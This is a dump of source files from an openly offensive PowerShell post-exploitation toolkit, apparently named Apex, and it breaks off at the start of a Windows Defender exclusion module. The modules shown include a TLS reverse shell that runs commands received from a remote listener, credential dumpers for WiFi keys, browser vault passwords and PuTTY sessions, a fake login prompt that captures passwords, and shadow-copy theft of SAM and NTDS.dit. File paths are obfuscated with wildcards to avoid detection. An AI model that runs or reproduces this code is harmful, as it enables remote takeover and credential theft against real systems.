91 | 92 | [*] Usage: Invoke-Compile -CopySam 93 | 94 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 95 | 96 | |---------------------------------------------------------------------| 97 | | -WiFiCreds | 98 | |---------------------------------------------------------------------| 99 | 100 | [*] Description: Invoke-Creds -WifiCreds functionality compiled as a 101 | .NET Assembly. 102 | 103 | Tested on Win 10 / .NET CLRVersion 4.0.30319.42000 104 | 105 | [*] Usage: Invoke-Compile -WiFiCreds 106 | 107 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 108 | 109 | |---------------------------------------------------------------------| 110 | | -SysInfo | 111 | |---------------------------------------------------------------------| 112 | 113 | [*] Description: Compiles a .NET Assembly that gathers information 114 | about the system. Will drop a "SysInfo.exe" in C:\windows\temp. 115 | When executed, will write results to $env:temp\SysInfo.txt. 116 | 117 | [*] Usage: Invoke-Compile -SysInfo 118 | 119 | \---------------------------------------------------------------------/ 120 | 121 | "@ 122 | } 123 | elseif ($List -eq $True) { 124 | Write @" 125 | 126 | Invoke-Compile Brief Command Usage: 127 | ----------------------------------- 128 | Invoke-Compile -CopySAM 129 | Invoke-Compile -WiFiCreds 130 | Invoke-Compile -SysInfo 131 | 132 | "@ 133 | } 134 | elseif ($CopySAM) { 135 | 136 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\CopySAM.exe $CsFile" 137 | 138 | $Source = @" 139 | using System.Collections.ObjectModel; 140 | using System.Management.Automation; 141 | using System; 142 | using System.IO; 143 | 144 | namespace $Z 145 | { 146 | class $Z 147 | { 148 | static void Main(string[] args) 149 | { 150 | using (PowerShell $X = PowerShell.Create().AddScript(@" 151 | `$class = [WMICLASS]'root\cimv2:win32_shadowcopy' 152 | `$class.create('C:\', 'ClientAccessible') 153 | `$DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 
154 | `$ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 155 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SYSTEM `$env:temp\SYSTEM) 156 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SECURITY `$env:temp\SECURITY) 157 | (C:\\windows\\system32\\cmd.exe /c copy `$DeviceObjectName\windows\system32\config\SAM `$env:temp\SAM) 158 | (C:\\windows\\system32\\vssadmin.exe delete shadows /Shadow=`$ShadowCopyID /quiet)")) 159 | { 160 | Collection Output = $X.Invoke(); 161 | } 162 | Environment.CurrentDirectory = Environment.GetEnvironmentVariable("temp"); 163 | DirectoryInfo dir = new DirectoryInfo("."); 164 | Console.WriteLine("[+] SYSTEM, SAM and SECURITY files saved to " + dir.FullName); 165 | } 166 | } 167 | } 168 | "@ 169 | 170 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 171 | Add-Content $CsFile $Source 172 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 173 | Sleep 4 174 | Remove-Item $env:temp\$Z.cs 175 | Write "`n [+] Assembly --> $env:temp\CopySAM.exe`n" 176 | } 177 | elseif ($WiFiCreds) { 178 | 179 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\WiFiCreds.exe $CsFile" 180 | 181 | $Source = @" 182 | using System.Collections.ObjectModel; 183 | using System.Management.Automation; 184 | using System; 185 | using System.IO; 186 | 187 | namespace $Z 188 | { 189 | class $Z 190 | { 191 | static void Main(string[] args) 192 | { 193 | using (PowerShell $X = PowerShell.Create().AddScript(@" 194 | (C:\windows\system32\netsh.exe wlan show profiles) | Select-String ""\:(.+)`$"" | %{`$name=`$_.Matches.Groups[1].Value.Trim(); `$_} | %{(netsh wlan show profile name=""`$name"" key=clear)} | Select-String ""Key Content\W+\:(.+)`$"" | %{`$pass=`$_.Matches.Groups[1].Value.Trim(); `$_} | %{[PSCustomObject]@{ ""Wireless Profile""=`$name;""Password""=`$pass }} | Format-Table -AutoSize | Out-File C:\windows\temp\$Z")) 195 | { 
196 | Collection Output = $X.Invoke(); 197 | } 198 | // Console.WriteLine("WiFi Credentials saved to C:\\windows\\temp\\$Z"); 199 | string text = System.IO.File.ReadAllText(@"C:\\windows\\temp\\$Z"); 200 | System.Console.WriteLine("{0}", text); 201 | // System.Console.ReadLine(); 202 | System.IO.File.Delete("C:\\windows\\temp\\$Z"); 203 | } 204 | } 205 | } 206 | "@ 207 | 208 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 209 | Add-Content $CsFile $Source 210 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 211 | Sleep 4 212 | Remove-Item $env:temp\$Z.cs 213 | Write "`n [+] Assembly --> $env:temp\WiFiCreds.exe`n" 214 | } 215 | elseif ($SysInfo) { 216 | 217 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\SysInfo.exe $CsFile" 218 | 219 | $Source = @" 220 | using System.Collections.ObjectModel; 221 | using System.Management.Automation; 222 | using System; 223 | using System.IO; 224 | 225 | namespace $Z 226 | { 227 | class $Z 228 | { 229 | static void Main(string[] args) 230 | { 231 | using (PowerShell $X = PowerShell.Create().AddScript(@" 232 | 233 | Write-Output ""`n--- OS Information: ---"" | Out-File C:\windows\temp\SysInfo.txt 234 | (get-wmiobject win32_operatingsystem | Select-Object Caption, Version, OSArchitecture, ServicePackMajorVersion, ServicePackMinorVersion, MUILanguages, LastBootUpTime, LocalDateTime, NumberOfUsers, SystemDirectory | Out-File -Append C:\windows\temp\SysInfo.txt) 235 | 236 | Write-Output ""`n--- Environment: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 237 | (Get-ChildItem Env: | ft Key,Value | Out-File -Append C:\windows\temp\SysInfo.txt) 238 | 239 | Write-Output ""`n--- Architecture: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 240 | (Get-WmiObject -Query ""SELECT * FROM Win32_Processor WHERE AddressWidth='64'"" | Out-File -Append C:\windows\temp\SysInfo.txt) 241 | 242 | Write-Output ""`n--- Users: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 243 | (Get-WmiObject -Class 
Win32_UserAccount -Filter ""LocalAccount='True'"" | select name, fullname | Out-File -Append C:\windows\temp\SysInfo.txt) 244 | 245 | Write-Output ""`n--- Local Admins: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 246 | (C:\??*?\*3?\n?t.?x? localgroup Administrators | Out-File -Append C:\windows\temp\SysInfo.txt) 247 | 248 | Write-Output ""`n--- Domain Admins: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 249 | (C:\??*?\*3?\n?t.?x? group 'Domain Admins' /domain | Out-File -Append C:\windows\temp\SysInfo.txt) 250 | 251 | Write-Output ""`n--- Privileges: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 252 | (C:\??*?\*3?\wh??m?.?x? /priv | Out-File -Append C:\windows\temp\SysInfo.txt) 253 | 254 | Write-Output ""`n--- HotFixes: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 255 | (Get-Hotfix | Sort-Object -Descending | Out-File -Append C:\windows\temp\SysInfo.txt) 256 | 257 | Write-Output ""`n--- Check Elevated: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 258 | `$check = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ""S-1-5-32-544"") 259 | if (`$check -eq `$true) { 260 | 261 | Write-Output "" [+] We're running as an elevated process."" | Out-File -Append C:\windows\temp\SysInfo.txt 262 | 263 | } 264 | if (`$check -eq `$false) { 265 | 266 | Write-Output "" [-] Not Elevated."" | Out-File -Append C:\windows\temp\SysInfo.txt 267 | } 268 | 269 | Write-Output ""`n--- Shares/Drives: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 270 | (Get-WmiObject Win32_Share | Out-File -Append C:\windows\temp\SysInfo.txt) 271 | 272 | Write-Output ""`n--- Logged On: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 273 | `$Explorer = (Get-WmiObject -Query ""select * from Win32_Process where Name='explorer.exe'"") 274 | 275 | if (!`$Explorer) { 276 | 277 | Write "" [-] No users currently interactively logged on."" | Out-File -Append C:\windows\temp\SysInfo.txt 278 | 279 | } 280 | else { 281 | foreach (`$p in 
`$Explorer) { 282 | `$Username = `$p.GetOwner().User 283 | `$Domain = `$p.GetOwner().Domain 284 | 285 | Write "" User: `$Domain\`$Username`n Logon Time: `$(`$p.ConvertToDateTime(`$p.CreationDate))"" | Out-File -Append C:\windows\temp\SysInfo.txt 286 | 287 | } 288 | } 289 | 290 | Write-Output ""`n--- Installed Applications: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 291 | (Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | Format-Table Parent,Name,LastWriteTime | Out-File -Append C:\windows\temp\SysInfo.txt) 292 | 293 | Write-Output ""`n--- Processes: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 294 | (Get-WmiObject -Query 'Select * from Win32_Process' | where {`$_.Name -notlike 'svchost*'} | Select Name, Handle, @{Label='Owner';Expression={`$_.GetOwner().User}} | Format-Table -AutoSize | Out-File -Append C:\windows\temp\SysInfo.txt) 295 | 296 | Write-Output ""`n--- Services: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 297 | (Get-WmiObject win32_service | Select-Object Name, DisplayName, @{Name=""Path""; Expression={`$_.PathName.split('""')[1]}}, State | Format-List | Out-File -Append C:\windows\temp\SysInfo.txt) 298 | 299 | Write-Output ""`n--- Tasks: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 300 | (Get-ChildItem C:\windows\system32\tasks |fl -Property Name,FullName | Out-File -Append C:\windows\temp\SysInfo.txt) 301 | 302 | Write-Output ""`n--- Installed AV: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 303 | [parameter(ValueFromPipeline=`$true, ValueFromPipelineByPropertyName=`$true)] 304 | [Alias('name')] 305 | `$computername=`$env:computername 306 | `$AntiVirusProducts = Get-WmiObject -Namespace ""root\SecurityCenter2"" -Class AntiVirusProduct -ComputerName `$computername 307 | 308 | `$ret = @() 309 | foreach(`$AntiVirusProduct in `$AntiVirusProducts){ 310 | switch (`$AntiVirusProduct.productState) { 311 | ""262144"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Disabled""} 312 | ""262160"" {`$defstatus = 
""Out of date"" ;`$rtstatus = ""Disabled""} 313 | ""266240"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Enabled""} 314 | ""266256"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 315 | ""393216"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Disabled""} 316 | ""393232"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Disabled""} 317 | ""393488"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Disabled""} 318 | ""397312"" {`$defstatus = ""Up to date"" ;`$rtstatus = ""Enabled""} 319 | ""397328"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 320 | ""397584"" {`$defstatus = ""Out of date"" ;`$rtstatus = ""Enabled""} 321 | default {`$defstatus = ""Unknown"" ;`$rtstatus = ""Unknown""} 322 | } 323 | `$ht = @{} 324 | `$ht.Computername = `$computername 325 | `$ht.Name = `$AntiVirusProduct.displayName 326 | `$ht.'Product GUID' = `$AntiVirusProduct.instanceGuid 327 | `$ht.'Product Executable' = `$AntiVirusProduct.pathToSignedProductExe 328 | `$ht.'Reporting Exe' = `$AntiVirusProduct.pathToSignedReportingExe 329 | `$ht.'Definition Status' = `$defstatus 330 | `$ht.'Real-time Protection Status' = `$rtstatus 331 | 332 | `$ret += New-Object -TypeName PSObject -Property `$ht 333 | } 334 | `$ret | Out-File -Append C:\windows\temp\SysInfo.txt 335 | 336 | Write-Output ""`n--- Local Client DNS Cache: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 337 | if (`$PSVersionTable.PSVersion.Major -eq ""2"") { 338 | 339 | Write "" [!] 
This function requires PowerShell version greater than 2.0."" | Out-File -Append C:\windows\temp\SysInfo.txt 340 | 341 | return 342 | } 343 | else { 344 | (Get-DnsClientCache | Out-File -Append C:\windows\temp\SysInfo.txt) 345 | } 346 | 347 | Write-Output ""`n--- PowerShell ConsoleHost History: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 348 | (Get-Content ""`$env:appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"" | Out-File -Append C:\windows\temp\SysInfo.txt) 349 | 350 | Write-Output ""`n--- Recent Documents: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 351 | (Get-ChildItem `$env:appdata\Microsoft\Windows\Recent\ | Out-File -Append C:\windows\temp\SysInfo.txt) 352 | 353 | Write-Output ""`n--- Network Interfaces: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 354 | (ipconfig /all | Out-File -Append C:\windows\temp\SysInfo.txt) 355 | 356 | Write-Output ""`n--- Network Connections: ---"" | Out-File -Append C:\windows\temp\SysInfo.txt 357 | (netstat -an | Out-File -Append C:\windows\temp\SysInfo.txt) 358 | 359 | ")) 360 | { 361 | Collection Output = $X.Invoke(); 362 | } 363 | string text = System.IO.File.ReadAllText(@"C:\\windows\\temp\\SysInfo.txt"); 364 | // System.Console.WriteLine("{0}", text); 365 | Console.WriteLine("SysInfo saved to C:\\windows\\temp\\SysInfo.txt"); 366 | // System.Console.ReadLine(); 367 | // System.IO.File.Delete("C:\\windows\\temp\\$Z"); 368 | } 369 | } 370 | } 371 | "@ 372 | 373 | New-Item "$env:temp\$Z.cs" -ItemType File >$null 2>&1 374 | Add-Content $CsFile $Source 375 | Start-Process -Wi Hidden -FilePath $Compiler -ArgumentList $CompilerArgs 376 | Sleep 4 377 | Remove-Item $env:temp\$Z.cs 378 | Write "`n [+] Assembly --> $env:temp\SysInfo.exe`n" 379 | } 380 | } -------------------------------------------------------------------------------- /modules/Invoke-Connect.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Connect { 2 | <# 3 | 4 
| .SYNOPSIS 5 | Transfers all Apex functionality to a remote SSL listener, and also functions as a non-interactive powershell reverse "shell" if invoked as a stand-alone cmdlet. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER ListenerIp 14 | The Listener IP Address. 15 | 16 | .PARAMETER ListenerPort 17 | The Listener Port. 18 | 19 | .EXAMPLE 20 | PS> Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443 21 | 22 | .NOTES 23 | Author: Fabrizio Siciliano (@0rbz_) 24 | 25 | #> 26 | 27 | [CmdletBinding()] 28 | param( 29 | [Parameter(Position=1)] 30 | [Switch]$Help, 31 | [Switch]$List, 32 | 33 | [Parameter(Position=0,Mandatory = $False)] 34 | [string]$ListenerIp, 35 | 36 | [Parameter(Position=1,Mandatory = $False)] 37 | [string]$ListenerPort 38 | ) 39 | 40 | if ($Help -or $List) { 41 | Write @" 42 | 43 | ### Invoke-Connect Help ### 44 | --------------------------- 45 | Available Invoke-Connect Commands: 46 | ---------------------------------- 47 | |--------------------------------------------------------------------------------| 48 | | [-ListenerIp] listener_ip [-ListenerPort] listener_port | 49 | |--------------------------------------------------------------------------------| 50 | 51 | [*] Description: Transfers all Apex functionality to a remote SSL listener, and 52 | also functions as a non-interactive powershell reverse "shell" if invoked as 53 | a stand-alone cmdlet. 54 | 55 | (SSL-enabled listener is required) 56 | 57 | [*] Usage: Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443 58 | 59 | [*] Mitre ATT&CK Ref: T1086 (PowerShell) 60 | [*] Mitre ATT&CK Ref: T1043 (Commonly Used Port) 61 | [*] Mitre ATT&CK Ref: T1352 (C2 Protocol Development) 62 | 63 | \--------------------------------------------------------------------------------/ 64 | 65 | "@ 66 | } 67 | elseif ($ListenerIp -and $ListenerPort) { 68 | if ($PSVersionTable.PSVersion.Major -eq "2") { 69 | Write "`n [!] 
This function requires PowerShell version greater than 2.0.`n" 70 | return 71 | } 72 | else { 73 | # https://stackoverflow.com/questions/11581914/converting-ip-address-to-hex 74 | 75 | # Use a hex-ified listener IP address for C2 comms 76 | $ListenerIp = "$ListenerIp" 77 | $ar = $ListenerIp.Split('.') 78 | $Octet1 = "{0:X2}" -f [int]$ar[0] 79 | $Octet2 = "{0:X2}" -f [int]$ar[1] 80 | $Octet3 = "{0:X2}" -f [int]$ar[2] 81 | $Octet4 = "{0:X2}" -f [int]$ar[3] 82 | $Hexip = "0x"+$Octet1 + $Octet2 + $Octet3 + $Octet4 83 | 84 | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 85 | 86 | $socket = New-Object System.Net.Sockets.TCPClient($Hexip,$ListenerPort) 87 | $stream = $socket.GetStream() 88 | $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) 89 | 90 | $sslStream.AuthenticateAsClient($Hexip) 91 | 92 | [byte[]]$bytes = 0..65535|%{0} 93 | while(($x = $sslStream.Read($bytes,0,$bytes.Length)) -ne 0) { 94 | $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$x) 95 | $flow = (Invoke-Expression $data | Out-String) + '[' + (Test-Connection -ComputerName $env:computername -count 1).IPV4Address.ipaddressTOstring +']'+'['+$env:username+'@'+$env:computername+']> ' 96 | $flow2 = ([text.encoding]::ASCII).GetBytes($flow) 97 | $sslStream.Write($flow2,0,$flow2.Length) 98 | $sslStream.Flush() 99 | } 100 | } 101 | } 102 | } 103 | 104 | -------------------------------------------------------------------------------- /modules/Invoke-Creds.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Creds { 2 | <# 3 | 4 | .SYNOPSIS 5 | Several methods for obtaining credentials from the target system. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER WifiCreds 14 | Dumps saved WiFi Credentials. 
15 | 16 | .PARAMETER IeCreds 17 | Dumps saved Internet Explorer/Edge Credentials. 18 | 19 | .PARAMETER AuthPrompt 20 | Invokes an authentication prompt to the target and captures any entered credentials. 21 | 22 | .PARAMETER PuttyKeys 23 | Dumps any saved putty sessions/keys/passwords. 24 | 25 | .PARAMETER CopySAM 26 | Utilizes Volume Shadow Copy to copy the SAM, SYSTEM and SECURITY files from C:\windows\system32\config. These can be parsed offline. 27 | 28 | .PARAMETER CopyNtds 29 | Utilizes Volume Shadow Copy to copy the NTDS.dit and SYSTEM files. These files can be parsed offline. 30 | 31 | .EXAMPLE 32 | PS> Invoke-Creds -WifiCreds 33 | 34 | .EXAMPLE 35 | PS> Invoke-Creds -PuttyKeys 36 | 37 | .EXAMPLE 38 | PS> Invoke-Creds -CopySAM -Dest C:\temp\ 39 | 40 | .NOTES 41 | Author: Fabrizio Siciliano (@0rbz_) 42 | 43 | #> 44 | 45 | [CmdletBinding()] 46 | param ( 47 | [Parameter(Position=1)] 48 | [Switch]$Help, 49 | [Switch]$List, 50 | 51 | [Parameter(Mandatory = $False)] 52 | [Switch]$WifiCreds, 53 | 54 | [Parameter(Mandatory = $False)] 55 | [Switch]$IeCreds, 56 | 57 | [Parameter(Mandatory = $False)] 58 | [Switch]$AuthPrompt, 59 | 60 | [Parameter(Mandatory = $False)] 61 | [Switch]$PuttyKeys, 62 | 63 | [Parameter(Mandatory = $False)] 64 | [Switch]$CopySAM, 65 | [String]$Dest, 66 | 67 | [Parameter(Mandatory = $False)] 68 | [Switch]$CopyNtds, 69 | [String]$Dest2=$Dest 70 | ) 71 | 72 | if ($Help -eq $True) { 73 | Write @" 74 | 75 | ### Invoke-Creds Help ### 76 | -------------------------------- 77 | Available Invoke-Creds Commands: 78 | -------------------------------- 79 | |---------------------------------------------------------------------| 80 | | -WiFiCreds | 81 | |---------------------------------------------------------------------| 82 | 83 | [*] Description: Dumps saved WiFi Credentials. 
84 | 85 | [*] Usage: Invoke-Creds -WiFiCreds 86 | 87 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 88 | 89 | |---------------------------------------------------------------------| 90 | | -IeCreds | 91 | |---------------------------------------------------------------------| 92 | 93 | [*] Description: Dumps saved Internet Explorer/Edge Credentials. 94 | 95 | [*] Usage: Invoke-Creds -IeCreds 96 | 97 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 98 | 99 | |---------------------------------------------------------------------| 100 | | -AuthPrompt | 101 | |---------------------------------------------------------------------| 102 | 103 | [*] Description: Invokes an authentication prompt to the target 104 | and captures any entered credentials. 105 | 106 | [*] Usage: Invoke-Creds -AuthPrompt 107 | 108 | [*] Mitre ATT&CK Ref: T1056 (Input Capture) 109 | 110 | |---------------------------------------------------------------------| 111 | | -PuttyKeys | 112 | |---------------------------------------------------------------------| 113 | 114 | [*] Description: Dumps any saved putty sessions/keys/passwords. 115 | 116 | [*] Usage: Invoke-Creds -PuttyKeys 117 | 118 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 119 | 120 | |---------------------------------------------------------------------| 121 | | -CopySAM [-Dest] dest | 122 | |---------------------------------------------------------------------| 123 | 124 | [*] Description: Utilizes Volume Shadow Copy to copy the SAM, SYSTEM 125 | and SECURITY files from C:\windows\system32\config. These can be 126 | parsed offline. 
127 | 128 | [*] Usage: Invoke-Creds -CopySAM -Dest C:\temp\ 129 | 130 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 131 | 132 | |---------------------------------------------------------------------| 133 | | -CopyNtds [-Dest] dest | 134 | |---------------------------------------------------------------------| 135 | 136 | [*] Description: Utilizes Volume Shadow Copy to copy the NTDS.dit 137 | and SYSTEM files. These files can be parsed offline. 138 | 139 | [*] Usage: Invoke-Creds -CopyNtds -Dest C:\temp\ 140 | 141 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 142 | 143 | \---------------------------------------------------------------------/ 144 | 145 | "@ 146 | } 147 | elseif ($List -eq $True) { 148 | Write @" 149 | 150 | Invoke-Creds Brief Command Usage: 151 | --------------------------------- 152 | Invoke-Creds -WiFiCreds 153 | Invoke-Creds -IeCreds 154 | Invoke-Creds -AuthPrompt 155 | Invoke-Creds -PuttyKeys 156 | Invoke-Creds -CopySAM -Dest C:\temp 157 | Invoke-Creds -CopyNtds -Dest C:\temp 158 | 159 | "@ 160 | } 161 | elseif ($WifiCreds) { 162 | 163 | # check for PS version in the event this is invoked from a stand-alone cmdlet 164 | if ($PSVersionTable.PSVersion.Major -eq "2") { 165 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 166 | return 167 | } 168 | else { 169 | # https://jocha.se/blog/tech/display-all-saved-wifi-passwords 170 | (C:\??*?\*3?\ne?s?.e?e wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ "Wireless Profile"=$name;"Password"=$pass }} | Format-Table -AutoSize 171 | } 172 | } 173 | elseif ($IeCreds) { 174 | # check for PS version in the event this is invoked from a stand-alone cmdlet 175 | if ($PSVersionTable.PSVersion.Major -eq "2") { 176 | Write "`n [!] 
This function requires PowerShell version greater than 2.0.`n" 177 | return 178 | } 179 | else { 180 | # https://www.toddklindt.com/blog/_layouts/mobile/dispform.aspx?List=56f96349-3bb6-4087-94f4-7f95ff4ca81f&ID=606 181 | [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 182 | $vault = New-Object Windows.Security.Credentials.PasswordVault 183 | $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | Format-List 184 | } 185 | } 186 | elseif ($AuthPrompt) { 187 | $c = Get-Credential 188 | $u = $c.GetNetworkCredential().username 189 | $p = $c.GetNetworkCredential().password 190 | 191 | Write "Username: $u" 192 | Write "Password: $p" 193 | } 194 | elseif ($PuttyKeys) { 195 | # check for PS version in the event this is invoked from a stand-alone cmdlet 196 | if ($PSVersionTable.PSVersion.Major -eq "2") { 197 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 198 | return 199 | } 200 | else { 201 | $SavedSessions = (Get-Item HKCU:\Software\SimonTatham\PuTTY\Sessions\*).Name | ForEach-Object { $_.split("\")[5]} 202 | 203 | foreach ($Session in $SavedSessions) { 204 | $HostName = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).Hostname 205 | $PrivateKey = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).PublicKeyFile 206 | $Username = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).UserName 207 | $ProxyHost = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyHost 208 | $ProxyPassword = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyPassword 209 | $ProxyPort = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyPort 210 | $ProxyUsername = (Get-ItemProperty HKCU:\Software\SimonTatham\PuTTY\Sessions\$Session).ProxyUsername 211 | $Results = "`nSession Name: $Session`nHostname/IP: $HostName`nUserName: $UserName`nPrivate Key: $PrivateKey`nProxy Host: 
$ProxyHost`nProxy Port: $ProxyPort`nProxy Username: $ProxyUsername`nProxy Password: $ProxyPassword" 212 | 213 | Write $Results 214 | } 215 | } 216 | } 217 | elseif ($CopySAM -and $Dest) { 218 | # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/create-method-in-class-win32-shadowcopy 219 | 220 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 221 | -match "S-1-5-32-544")) -and $(Test-Path "C:\windows\system32\config\SAM")) { 222 | 223 | # create shadow copy 224 | $class = [WMICLASS]"root\cimv2:win32_shadowcopy" 225 | $class.create("C:\", "ClientAccessible") 226 | 227 | # get the Device object name and Shadow Copy ID. 228 | $DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 229 | $ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 230 | 231 | # copy SYSTEM 232 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SYSTEM $Dest) 233 | 234 | # copy SECURITY 235 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SECURITY $Dest) 236 | 237 | # copy SAM 238 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SAM $Dest) 239 | 240 | # delete the shadow copy we created 241 | (C:\??*?\*3?\v?*a?mi?.?x? delete shadows /Shadow=$ShadowCopyID /quiet) 242 | } 243 | elseif (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 244 | Write "`n [!] This process requires elevation. Make sure you're admin first.`n" 245 | } 246 | else { 247 | Write "`n [!] 
Can't find SAM file.`n" 248 | } 249 | } 250 | elseif ($CopyNtds -and $Dest) { 251 | 252 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $(Test-Path "C:\windows\NTDS\NTDS.dit")) { 253 | # create shadow copy 254 | $class = [WMICLASS]"root\cimv2:win32_shadowcopy" 255 | $class.create("C:\", "ClientAccessible") 256 | 257 | # get the Device object name and Shadow Copy ID. 258 | $DeviceObjectName = (Get-WmiObject win32_shadowcopy | select -ExpandProperty DeviceObject -Last 1) 259 | $ShadowCopyID = (Get-WmiObject win32_shadowcopy | select -ExpandProperty ID | select -Last 1) 260 | 261 | # copy NTDS 262 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\NTDS\NTDS.dit $Dest) 263 | 264 | # copy SYSTEM 265 | (C:\??*?\*3?\?md.?x? /c copy $DeviceObjectName\windows\system32\config\SYSTEM $Dest) 266 | 267 | # delete the shadow copy we created 268 | (C:\??*?\*3?\v?*a?mi?.?x? delete shadows /Shadow=$ShadowCopyID /quiet) 269 | } 270 | elseif (!$([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 271 | Write "`n [!] This process requires elevation. Make sure you're admin first.`n" 272 | } 273 | else { 274 | Write "`n [!] Can't find NTDS.dit file.`n" 275 | } 276 | } 277 | } 278 | 279 | -------------------------------------------------------------------------------- /modules/Invoke-DefenderTools.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-DefenderTools { 2 | <# 3 | 4 | .SYNOPSIS 5 | Several functions to aid in interacting with Windows Defender. 6 | 7 | .PARAMETER Help 8 | Shows detailed help for each function. 9 | 10 | .PARAMETER List 11 | Shows summary list of available functions. 12 | 13 | .PARAMETER GetExcludes 14 | Gets any current exclude files/paths/extensions currently configured in Windows Defender via the Registry. 15 | 16 | .PARAMETER AddExclude 17 | Adds a path exclude to Windows Defender. 
